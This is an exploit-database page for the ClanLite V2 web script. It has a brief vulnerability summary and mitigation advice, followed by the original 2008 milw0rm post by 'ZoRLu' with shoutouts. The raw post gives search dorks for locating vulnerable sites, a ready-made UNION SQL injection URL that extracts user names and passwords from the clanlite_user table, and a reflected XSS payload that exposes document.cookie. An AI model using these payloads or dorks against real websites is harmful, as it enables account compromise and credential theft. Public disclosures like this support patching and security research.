header-logo
Suggest Exploit
vendor:
ClanLite V2
by:
ZoRLu
5.5
CVSS
MEDIUM
SQL Injection, XSS
CWE
Product Name: ClanLite V2
Affected Version From: ClanLite V2
Affected Version To: ClanLite V2.2006.05.20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

ClanLite V2 SQL Injection & XSS

The ClanLite V2 script is vulnerable to SQL injection and XSS attacks. The SQL injection vulnerability can be exploited by an attacker to extract sensitive information from the database. The XSS vulnerability allows an attacker to inject and execute malicious scripts on the affected website.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user input before using it in SQL queries and to implement proper input validation and output encoding to prevent XSS attacks. It is also advisable to keep the ClanLite V2 script up to date with the latest security patches.
Source

Exploit-DB raw data:

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

ClanLite V2 SQL inj. & XSS

dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005

dork: Themed By Ray © 2003, 2004 iOptional 

readme script

/****************************************************************************
 *	Fichier		: 															*
 *	Copyright	: (C) 2004 ClanLite V2											*
 *	Email		: support@clanlite.org										*
 *																			*
 *   This program is free software; you can redistribute it and/or modify	*
 *   it under the terms of the GNU General Public License as published by	*
 *   the Free Software Foundation; either version 2 of the License, or		*
 *   (at your option) any later version.									*
 ***************************************************************************/
   
 author: ZoRLu 

   home: ( yildirimordulari.org ) ( z0rlu.ownspace.org ) ( milw0rm.org ) ( r00tsecurity.org ) ( securityfocus.com ) 

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )

    Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da  :((

    Not: http://www.z0rlu.ownspace.org   acIklarIn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

http://localhost/clanlite_path/service/profil.php?link=[SQL]


[SQL]=

ZoRLu'/**/union/**/select/**/null,null,mail,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,0x3a,psw),null,null,null/**/from/**/clanlite_user/*


[XSS]=

http://localhost/clanlite/service/calendrier.php?mois=6&annee="><script>alert(document.cookie)</script>


########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, bLaCk, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK,

kasIrga(lavrens), w3R3m, avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti  :(((

########## CANAKKALE GECiLMEZ  yildirimordulari.org z0rlu.ownspace.org ##############################

# milw0rm.com [2008-05-12]

Navigation

Suggest Exploit

Services By CQR